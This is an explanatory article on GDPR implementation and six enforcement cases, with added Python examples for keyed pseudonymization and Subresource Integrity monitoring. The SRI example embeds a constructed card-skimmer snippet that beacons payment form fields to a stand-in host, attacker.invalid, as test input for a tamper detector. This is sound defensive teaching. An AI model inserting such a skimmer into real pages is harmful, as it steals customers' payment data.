Data protection implementation under GDPR
The General Data Protection Regulation (GDPR, Regulation (EU) 2016/679) is the EU's comprehensive data protection law. It was adopted in 2016 and has applied across the EU and the wider EEA since May 25, 2018. It aims to give individuals more control over their personal data and to replace the patchwork of national laws that implemented the 1995 Data Protection Directive with a single, directly applicable regulation.
Implementation rests on the Article 5 principles: lawfulness, fairness and transparency; purpose limitation; data minimization; accuracy; storage limitation; integrity and confidentiality; and accountability, meaning the controller must be able to demonstrate compliance with the other six. Organizations that fail to comply face administrative fines of up to €20 million or 4% of worldwide annual turnover, whichever is higher (Article 83).
Below is an overview of the key components of data protection implementation under GDPR, followed by an analysis of six significant enforcement cases.
📌 GDPR Data Protection Implementation – Key Components
1. Lawful Basis for Processing
Every processing operation needs one of the six legal bases in Article 6(1): consent, performance of a contract, compliance with a legal obligation, protection of vital interests, a task carried out in the public interest or in the exercise of official authority, or the controller's legitimate interests (which must be balanced against the individual's interests and cannot be relied on by public authorities acting as such). Special categories of data (health, religious beliefs, biometric data used for identification, and so on) additionally need one of the Article 9(2) exceptions, and the basis must be decided and documented before processing starts, not retrofitted.
2. Data Subject Rights
GDPR grants individuals the following rights (Articles 12 to 22), which controllers must generally act on within one month of a request (extendable by two further months for complex or numerous requests):
Right to be informed
Right of access
Right to rectification
Right to erasure (right to be forgotten)
Right to restrict processing
Right to data portability
Right to object
Rights in relation to automated decision making and profiling
3. Data Protection by Design and by Default
Organizations must embed data protection into processing activities and business practices from the design phase onward (Article 25), and must default to the most privacy-protective settings: by default only the personal data necessary for each specific purpose is processed, and data is not made accessible to an indefinite number of people without the individual's intervention.
4. Data Protection Impact Assessments (DPIAs)
Required (Article 35) before starting processing that is likely to result in a high risk to individuals, such as systematic large-scale monitoring, large-scale processing of special category data, or automated decisions with legal or similarly significant effects. The DPIA describes the processing, assesses necessity and proportionality, identifies the risks and the measures that mitigate them; if a high residual risk remains, the supervisory authority must be consulted before processing begins (Article 36).
5. Record of Processing Activities (ROPA)
Organizations must maintain written records of their processing activities (Article 30): purposes, categories of data subjects and data, recipients, international transfers, retention periods and a general description of security measures. Enterprises with fewer than 250 employees are exempt unless the processing is likely to result in a risk, is not occasional, or involves special category or criminal data, which in practice covers most organizations with a customer database.
6. Appointment of Data Protection Officer (DPO)
A DPO must be appointed (Article 37) by public authorities, by organizations whose core activities involve regular and systematic large-scale monitoring of individuals, and by those whose core activities involve large-scale processing of special category or criminal data. Other organizations may appoint one voluntarily; once appointed, the DPO has the same statutory position, must report to the highest management level and must not be penalized for performing the role.
7. Security Measures
Appropriate technical and organizational measures must be implemented to ensure a level of security appropriate to the risk (Article 32). The article names pseudonymization and encryption; the ability to ensure ongoing confidentiality, integrity, availability and resilience of processing systems; the ability to restore availability and access promptly after an incident; and regular testing and evaluation of the effectiveness of the measures. "Appropriate" is judged against the state of the art, implementation cost and the nature and risk of the processing, so a payment system is held to a higher standard than a newsletter list.
8. Breach Notification
A personal data breach must be reported to the supervisory authority without undue delay and, where feasible, within 72 hours of the controller becoming aware of it, unless the breach is unlikely to result in a risk to individuals (Article 33); a late notification must explain the delay. Where the breach is likely to result in a high risk, the affected individuals must also be informed without undue delay (Article 34). Processors must notify their controllers without undue delay, and every breach, notified or not, must be documented internally so the authority can verify compliance.
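Article 32(1)(a) names pseudonymization as a security measure, and Article 4(5) defines it as processing where the data can no longer be attributed to a person without "additional information" that is "kept separately". The following added example (not code from this page or from any of the organizations discussed) shows the difference that definition makes in practice: a bare SHA-256 of an email address is reversible by anyone holding a list of candidate addresses, while an HMAC under a key stored outside the dataset is not. The sample addresses, the attacker's candidate list and the key handling are constructed for illustration.

```python
"""Keyed pseudonymization of identifiers (Article 32(1)(a) / Article 4(5)).

Added example, not code from the page. Contrasts an unkeyed SHA-256 of an
email address with an HMAC under a key kept apart from the dataset, and
shows who can re-identify the records in each case. Sample data, the
attacker's candidate list and the key handling are constructed.
"""
import hashlib
import hmac
import secrets
from typing import Callable, Dict, Iterable, Optional

# Constructed: identifiers in the dataset to be pseudonymized.
SAMPLE_EMAILS = ["alice@example.com", "bob@example.org", "carol@example.net"]

# Constructed: what an attacker can plausibly enumerate (an old export, a
# breached user list, guessable patterns). It contains the real addresses.
CANDIDATE_EMAILS = SAMPLE_EMAILS + ["dave@example.com", "erin@example.org"]


def _normalize(email: str) -> bytes:
    # Normalize before hashing so 'Alice@Example.com ' maps to the same pseudonym.
    return email.strip().lower().encode("utf-8")


def naive_pseudonym(email: str) -> str:
    """Weak: unkeyed SHA-256. Deterministic and public, so it is a lookup key, not a secret."""
    return hashlib.sha256(_normalize(email)).hexdigest()


def keyed_pseudonym(email: str, key: bytes) -> str:
    """Hardened: HMAC-SHA256 under a secret key stored outside the pseudonymized dataset
    (the 'additional information kept separately' of Article 4(5))."""
    return hmac.new(key, _normalize(email), hashlib.sha256).hexdigest()


def reverse_by_dictionary(pseudonyms: Iterable[str], candidates: Iterable[str],
                          fn: Callable[[str], str]) -> Dict[str, str]:
    """Recompute fn over the candidates and match against stored pseudonyms.
    This is the attacker's move against unkeyed hashes, and the controller's
    legitimate re-linking step when it holds the key."""
    table = {fn(c): c for c in candidates}
    return {p: table[p] for p in pseudonyms if p in table}


def demo(key: Optional[bytes] = None) -> Dict[str, int]:
    """Run both schemes and report how many identifiers each party can recover."""
    key = key if key is not None else secrets.token_bytes(32)
    wrong_key = bytes(b ^ 0xFF for b in key)  # the attacker's guess; any wrong key behaves the same

    naive = [naive_pseudonym(e) for e in SAMPLE_EMAILS]
    keyed = [keyed_pseudonym(e, key) for e in SAMPLE_EMAILS]

    naive_hits = reverse_by_dictionary(naive, CANDIDATE_EMAILS, naive_pseudonym)
    attacker_hits = reverse_by_dictionary(
        keyed, CANDIDATE_EMAILS, lambda e: keyed_pseudonym(e, wrong_key))
    key_holder_hits = reverse_by_dictionary(
        keyed, CANDIDATE_EMAILS, lambda e: keyed_pseudonym(e, key))

    return {
        "total": len(SAMPLE_EMAILS),
        "naive_recovered_by_attacker": len(naive_hits),
        "keyed_recovered_by_attacker": len(attacker_hits),
        "keyed_recovered_by_key_holder": len(key_holder_hits),
    }


if __name__ == "__main__":
    print(demo())
```

Two consequences follow from the last line of the result. While the key exists, the key holder can re-link every record, so pseudonymized data is still personal data and all GDPR obligations continue to apply. Destroying the key (at the end of the retention period, or to honor an erasure request across backups that cannot be edited) removes that link without touching the dataset itself. The key belongs in a KMS or HSM with its own access controls, never in the same database as the pseudonyms.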
⚖️ GDPR Case Law – Detailed Analysis of Landmark Cases
Case 1: Google LLC (France – CNIL) – €50 million fine (2019)
Facts:
In January 2019 the French data protection authority CNIL fined Google LLC €50 million over the account creation flow on Android, for failing to provide transparent information and for relying on consent for ad personalization that had not been validly obtained.
Issues:
Essential information (purposes, retention periods, the categories of data combined for personalization) was spread across several documents and reachable only after multiple clicks, so users could not readily understand what was being done with their data.
Users were not adequately informed that data from many Google services would be combined to personalize ads, or of how intrusive that combination was.
Consent was neither specific nor unambiguous: the ad personalization option was pre-ticked, and a single "I agree" covered all of Google's processing purposes at once, so users could not consent to personalization separately from the rest.
GDPR Violations:
Article 6 (no valid lawful basis, because the consent relied on did not meet Article 4(11))
Articles 12 and 13 (transparent information to the data subject)
Article 7 (conditions for consent)
Outcome:
This was the first major fine under GDPR and the first against a large technology company. CNIL held that consent must be informed, specific and unambiguous, given by a clear affirmative act, and that Google's layered structure of information made it too difficult for users to grasp the scale and intrusiveness of the processing. Google's appeal was rejected by the Conseil d'État in June 2020.
Significance:
Highlighted that transparency is a design property of the interface, not a property of the privacy policy: the information must be presented where the decision is made, and a pre-ticked box or a bundled "accept all" is not consent.
Case 2: British Airways – £20 million fine (UK, ICO – 2020)
Facts:
Between June and September 2018 attackers skimmed the personal data of approximately 430,000 customers and staff from British Airways' website and mobile app, including names, addresses, login details, payment card details and travel booking details.
Cause:
The ICO's penalty notice describes a multi-stage intrusion rather than a single lapse. The attacker logged in through BA's remote access gateway using credentials belonging to an employee of a third-party supplier, with no multi-factor authentication required; broke out of the restricted application environment; found privileged account credentials stored in plaintext on the network; and finally modified a JavaScript file served on the payment pages so that card details were copied to a look-alike domain under the attacker's control as customers typed them. The ICO found that measures available at the time, such as MFA on remote access, limiting access to applications and data to what each account needed, and rigorous testing, would have prevented or mitigated the attack.
GDPR Violations:
Article 32 (security of processing)
Article 5(1)(f) (integrity and confidentiality)
Outcome:
The ICO's July 2019 notice of intent proposed a fine of £183.39 million. After considering BA's representations, the remedial steps taken after the breach and the economic impact of COVID-19, the final penalty issued in October 2020 was £20 million, at the time still the largest the ICO had imposed.
The regulator found that BA had not detected the attack itself: the skimming ran for more than two months before a third party alerted the airline, and the data that was exfiltrated should have been protected by measures that were readily available and inexpensive relative to BA's size.
Significance:
Reinforced that security under Article 32 is judged against what was reasonably available at the time (MFA, least-privilege access, no plaintext credentials, monitoring for changes to web assets), that supplier credentials are part of the attack surface, and that failing to detect an attack for months is itself evidence that the measures were inadequate.
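The attack class in this case is a modified first-party script on the payment page that copies card details to another host as they are typed. One control that catches this is pinning each script's Subresource Integrity digest at deploy time and re-verifying the bytes actually served, both in the browser (through the integrity attribute) and from an out-of-band monitor. The following added example is not code from this page or from British Airways; the scripts, the skimmer payload and the host name attacker.invalid are constructed for illustration.

```python
"""Integrity pinning for scripts on a payment page (Subresource Integrity digests).

Added example, not code from the page or from British Airways. Computes the
SRI digest browsers expect, emits the script tag, and runs a monitor pass that
reports any served script whose bytes no longer match the pinned digest.
The two scripts and the skimmer payload are constructed.
"""
import base64
import hashlib
import hmac
from typing import Dict, List

# Constructed: the script as deployed.
PRISTINE_SCRIPT = b"""
// payment.js (constructed example)
function submitPayment(form) {
  return fetch('/api/pay', { method: 'POST', body: new FormData(form) });
}
"""

# Constructed: the same file with a skimmer appended. Everything above it is
# untouched, so the page keeps working and nothing visibly breaks.
TAMPERED_SCRIPT = PRISTINE_SCRIPT + b"""
document.addEventListener('submit', function (e) {
  var fields = Array.from(new FormData(e.target));
  navigator.sendBeacon('https://attacker.invalid/collect', JSON.stringify(fields));
});
"""

SRI_ALGORITHMS = ("sha256", "sha384", "sha512")


def sri_digest(body: bytes, alg: str = "sha384") -> str:
    """Return the value browsers expect in integrity="...": '<alg>-<base64 digest>'."""
    if alg not in SRI_ALGORITHMS:
        raise ValueError(f"SRI permits only {SRI_ALGORITHMS}, got {alg!r}")
    digest = hashlib.new(alg, body).digest()
    return f"{alg}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, pinned: str) -> str:
    """HTML the deploy step emits; the browser refuses to execute the script if the digest differs."""
    return f'<script src="{src}" integrity="{pinned}" crossorigin="anonymous"></script>'


def verify_integrity(body: bytes, pinned: str) -> bool:
    """True only if body hashes to the pinned value. Rejects unknown algorithms and
    uses a constant-time comparison so a mismatch leaks nothing about the digest."""
    alg, sep, _ = pinned.partition("-")
    if not sep or alg not in SRI_ALGORITHMS:
        return False
    return hmac.compare_digest(sri_digest(body, alg), pinned)


def check_page_scripts(served: Dict[str, bytes], pins: Dict[str, str]) -> List[str]:
    """Monitor pass: for each pinned script, compare the served bytes (here: a lookup,
    in production: an HTTP fetch of the live page) and report every mismatch.
    A missing script is reported too; silently dropping a pinned asset is also a change."""
    return [name for name, pinned in pins.items()
            if served.get(name) is None or not verify_integrity(served[name], pinned)]


if __name__ == "__main__":
    pin = sri_digest(PRISTINE_SCRIPT)
    print(script_tag("/static/payment.js", pin))
    print("clean:", check_page_scripts({"payment.js": PRISTINE_SCRIPT}, {"payment.js": pin}))
    print("skimmed:", check_page_scripts({"payment.js": TAMPERED_SCRIPT}, {"payment.js": pin}))
```

Browser-enforced SRI protects the file only while the HTML that references it is itself unmodified, which is why the out-of-band monitor should pin the HTML (or at least the script tags) as well as the scripts. Pins must be regenerated by the deploy pipeline so that a legitimate release is not reported as tampering, and the monitor should fetch the page as a real customer would, since a skimmer can be served conditionally.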
Case 3: H&M (Germany – Hamburg DPA) – €35.3 million fine (2020)
Facts:
In October 2020 the Hamburg Commissioner for Data Protection fined H&M Hennes & Mauritz Online Shop AB & Co. KG €35.3 million for its handling of employee data at a service center in Nuremberg. Since at least 2014, after an employee returned from holiday or sick leave, team leaders held "welcome back talks" and recorded details of the absence, including diagnoses and symptoms, alongside family problems and religious beliefs picked up from casual conversations; the notes were stored on a network drive and used, among other things, to evaluate performance and inform employment decisions.
GDPR Violations:
Article 5(1)(a) (lawfulness, fairness and transparency) and Article 5(1)(c) (data minimization)
Article 6 (no lawful basis for collecting and retaining the records)
Article 9 (special categories of data: health and religious beliefs, with no Article 9(2) exception)
Outcome:
The records were detailed, kept for years and accessible to up to around 50 managers across the company; they came to light in October 2019 when a configuration error briefly made the drive readable company-wide.
After discovery, H&M introduced corrective measures, including a new data protection concept for the site, and paid compensation to affected employees; the regulator treated this cooperation as mitigating when setting the fine.
Significance:
Underlined that GDPR applies to employers as controllers of employee data, that special category data in the workplace needs an Article 9 basis, and that data minimization and access control apply to internal HR records just as they do to customer data. A shared drive readable by 50 managers is an access-control failure regardless of whether anyone outside the company ever saw it.
Case 4: Meta (Ireland – DPC) – €1.2 billion fine (2023)
Facts:
In May 2023 the Irish Data Protection Commission (DPC), acting on a binding decision of the European Data Protection Board, fined Meta Platforms Ireland €1.2 billion for continuing to transfer personal data of European Facebook users to Meta Platforms, Inc. in the United States on the basis of Standard Contractual Clauses after the CJEU's Schrems II judgment.
Key Issue:
The SCCs themselves remained valid, but they are a contract between private parties and cannot bind U.S. authorities. In Schrems II (C-311/18, July 2020) the CJEU invalidated the EU-U.S. Privacy Shield and held that an exporter relying on SCCs must assess whether the destination's law undermines the clauses and add supplementary measures where it does.
The DPC found that Meta's supplementary measures did not close the gaps the court had identified in U.S. surveillance law, in particular government access under FISA Section 702 without proportionality guarantees or effective redress for EU individuals, so the transfers lacked appropriate safeguards.
GDPR Violations:
Chapter V (international transfers)
Article 46(1) (transfers subject to appropriate safeguards; the SCCs did not ensure an essentially equivalent level of protection)
Outcome:
Record €1.2 billion administrative fine, the largest under GDPR to date, imposed at the EDPB's direction because the infringement was systematic, repetitive and continuous.
Meta was ordered to suspend future transfers to the U.S. within five months and to bring its processing into compliance within six months, including by ceasing the unlawful storage in the U.S. of data already transferred.
Significance:
This case reaffirmed that a transfer mechanism is only as good as the legal regime at the destination: the exporter must verify that data subjects keep enforceable rights and effective legal remedies there, and contractual clauses cannot substitute for them. The practical route out was the EU-U.S. Data Privacy Framework adequacy decision adopted in July 2023, which itself depends on the U.S. commitments it rests on holding up in court.
Case 5: TikTok (Ireland – DPC) – €345 million fine (2023)
Facts:
In September 2023 the DPC fined TikTok Technology Limited €345 million for its processing of child users' (aged 13 to 17) data between 31 July and 31 December 2020, again following a binding decision of the EDPB.
Issues:
Accounts of users under 18 were set to public by default, so anyone could view and comment on their videos, and the registration and video-posting flows nudged users towards public settings.
Child users were not given transparent information about the default settings or about the consequences of choosing a public account.
The "Family Pairing" feature allowed any adult to link to a child's account without verifying that the adult was the child's parent or guardian, and allowed that adult to enable direct messaging for users over 16.
GDPR Violations:
Article 5(1)(a) (fairness, because of the nudging) and Article 5(1)(c) (data minimization)
Articles 12 and 13 (clear information, in a form children can understand)
Articles 24 and 25 (responsibility of the controller; data protection by design and by default)
Outcome:
Alongside the fine, TikTok received a reprimand and an order to bring its processing into compliance within three months, including the default settings and the information presented to minors. TikTok had already changed the defaults for under-16 accounts to private in January 2021, after the period under investigation.
Significance:
Demonstrated that children's data attracts heightened protection (Recital 38) and that defaults are a legal question, not a product choice: Article 25(2) requires the most protective setting unless the user actively chooses otherwise, and a flow that steers users away from that setting breaches fairness.
Case 6: Clearview AI – Multiple EU Fines (France, Italy, Greece)
Facts:
Clearview AI scraped billions of facial images and associated metadata from publicly accessible websites and social media without the knowledge or consent of the people pictured, computed biometric templates from them, and sold a search service over the resulting database to law enforcement and other customers.
GDPR Violations:
Article 5(1)(a) and Article 6 (no lawful basis; legitimate interest was rejected given the intrusiveness and the lack of any reasonable expectation)
Article 9 (special category data: biometric data processed to uniquely identify a person, with no Article 9(2) exception)
Articles 12 and 14 (no transparency towards people whose data was obtained from third-party sites)
Articles 15 to 22 (data subject rights, in particular access and erasure requests that were ignored or only partially answered)
Outcome:
The Italian (Garante, March 2022), Greek (HDPA, July 2022) and French (CNIL, October 2022) authorities each imposed the maximum €20 million fine, ordered deletion of data on people in their jurisdictions and prohibited further collection, for €60 million combined; CNIL later added a €5.2 million overdue penalty for non-compliance, and the Dutch authority followed with a €30.5 million fine in 2024.
Significance:
Clearview's case illustrates that biometric data processed to uniquely identify a person falls under Article 9 and needs one of its exceptions (for a commercial scraper, in practice only explicit consent), that "publicly available" does not mean free to reuse for a new purpose, and that under Article 3(2) a company with no EU establishment must still comply when it monitors the behavior of people in the EU. Enforcing against a company with no EU presence or assets is the hard part, as CNIL's overdue penalty shows.
✅ Conclusion
These cases demonstrate that GDPR is being actively enforced and that fines are substantial, particularly for:
Inadequate consent mechanisms
Poor security practices
Failure to protect children's data
Unlawful data transfers
Mishandling employee or biometric data
Best practices for GDPR compliance include:
Conducting DPIAs before high-risk processing begins, and consulting the supervisory authority where high residual risk remains
Ensuring transparent privacy notices, presented at the point where the user decides, with consent collected per purpose and never pre-ticked
Defaulting to the most protective settings and verifying who is granted access to whose data
Using robust security controls (Article 32): MFA on remote and privileged access, least-privilege access, encryption and pseudonymization, integrity monitoring of web assets, and regular testing
Maintaining up-to-date processing records, including retention periods and international transfers with their safeguards
Appointing a DPO when required
Responding promptly to data subject requests, within the one-month deadline
Having a breach response process that can assess risk and notify the authority within 72 hours of becoming aware